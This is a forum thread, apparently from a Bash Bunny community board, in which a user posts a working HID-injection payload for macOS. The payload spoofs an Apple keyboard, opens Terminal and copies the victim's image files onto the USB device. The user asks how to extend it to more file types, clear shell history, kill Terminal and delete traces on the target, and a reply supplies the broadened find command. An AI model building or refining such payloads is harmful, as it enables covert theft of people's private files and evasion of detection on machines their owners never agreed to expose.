me2019 Posted September 14, 2019 Posted September 14, 2019 Hello, I was playing around with the MacPDFExfil payload on my Bash Bunny and as expected it worked fine. I however tried to modify it a bit and ran into some trouble. I wanted the BashBunny to look for .jpg, . jpeg and .png files all at the same time and put them into the loot folder. Changing it to only one of them is no problem but I couldn't figure out a way to look for all 3 file types at the same time. Moreover, I wanted the code to have an history -c and then the killall Terminal to leave as little trace of what I did as possible. Obviously that didn't work either. Replacing the killall Terminal with history -c works fine but having history -c and then killall Terminal didn't work. I played around with it and either I got an error or the last part (killall Terminal) just didn't show up at all. Last but not least I would also like to remove the /loot folder that is created on the target machine itself. If someone could help me with that I'd appreciate it a lot. Thanks Quote #!/bin/bash # # Title: MacPDFExfil # Author: k1ul3ss # Props: audibleblink # Version: 1.0 # Category: Exfiltration # Target: macOS # Attackmodes: HID, Storage ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E # device name dev_name="BashBunny" # loot directory lootdir="/Volumes/$dev_name/loot/Images/" QUACK GUI SPACE QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER QUACK DELAY 2000 QUACK STRING mkdir -p $lootdir QUACK ENTER QUACK STRING find \~ -name \'*.png\' -exec cp \"{}\" $lootdir \\\;\; killall Terminal QUACK ENTER # sync the filesystem sync
Hoskins355 Posted October 11, 2020 Posted October 11, 2020 find ./ -type f \( -name \*.jpg -o -name \*.png \)
Recommended Posts
Archived
This topic is now archived and is closed to further replies.